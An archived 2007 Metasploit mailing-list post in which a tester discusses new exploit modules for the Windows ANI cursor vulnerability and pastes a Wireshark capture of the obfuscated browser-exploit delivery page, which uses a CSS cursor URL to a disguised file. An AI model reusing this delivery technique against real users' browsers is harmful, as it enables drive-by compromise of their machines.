Metasploit mailing list archives
Metasploit vs ANI
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Mon, 02 Apr 2007 10:58:53 +0200
Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems. Matt Miller posted to the Metasploit Blog about our ANI efforts: http://blog.metasploit.com/ The two exploits can be viewed in the svn repository at metasploit.com: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb
Nice work! I've just been testing ANI/HTTP payload against XPSP2 and Vista, and the Web page seems somewhat "corrupted". As a result, IE displays ASCII characters without even crashing. I cannot even see the "anih" header. The page might be GZIP'ed even if default options are set to turn off all evasion techniques. What do you think ? Filtered Wireshark transcript below (non-printable characters removed). --------------------------------------------------------------------------------- GET /lol HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: fr Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 172.16.21.131:8080 Connection: Keep-Alive HTTP/1.1 200 OK Server: Apache Content-Type: text/html Content-Length: 2190 Connection: Keep-Alive <html><head><title>iwIoCkcqMXo7NUF4jAab7WfntgguEDrbsQx15s1ofLRvJEKy1flkODQg8I974dg8U8kaDfJr0U6</title></head><body>XGbXGxssfFg0v45z0GrMpAdpKH5tv71MoP4orVvRg5L7JCv1wklX4EoDjouIQ9jvQg3zHit4bGryWUZy<div style='... /* ... ZX6LrSqnsg3GSVC0SNA2zqW7m7U9s88ug4q4TUBh03dAo7QcMlzgbTVLb9U8ObHzq3Si4SFLOfGWppqEVA ...*/ CursOR /* oNVff76dUP3s62xTrUKNr5IcmLIMv8F32q62o20UuJTmI4kmNkc4BZEdP8BmUrRE6NQb1au5gaakFV5UOg8vfl7MGNqW6PvMGSSLUVeYKyFaAbH. .*/ /*.. GWqQmaoquKHPIlTNHkHCaJPP5ecZOwgP2W0w0Pf4l77EyNBbfBimNEZkGSWU7bYWjSVaUOJbiJh .*/. URL( . /*. qT0bk8NjfYImQIICym7f5lvHidMBIZsGIlSTRmnsYzimxyQ8KlPXPpc1ykJE */ "/lol/aOqmmblrCLUVJrY0R1he7O3UdKPxCcb20QvZMSROQ9J5czCyXrQMFHNHP9crTdcLPaUBODji.wav?qZY=1" ./* .lwgbsRjAQ34gH3SUz . */ .); ./* rNpUJXbAD0XwmM3v */ '>IK0KlqBe5DnxRNVoCZtK94xSLyUfY3</div></body></html> --------------------------------------------------------------------------------- Regards, - Nicolas RUFF
Current thread:
- Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Nicolas RUFF (Apr 02)
- Metasploit vs ANI Saad Kadhi (Apr 02)
- Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Nicolas RUFF (Apr 02)
- Metasploit vs ANI mmiller at hick.org (Apr 02)
- Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Giorgio Casali (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Nicolas RUFF (Apr 02)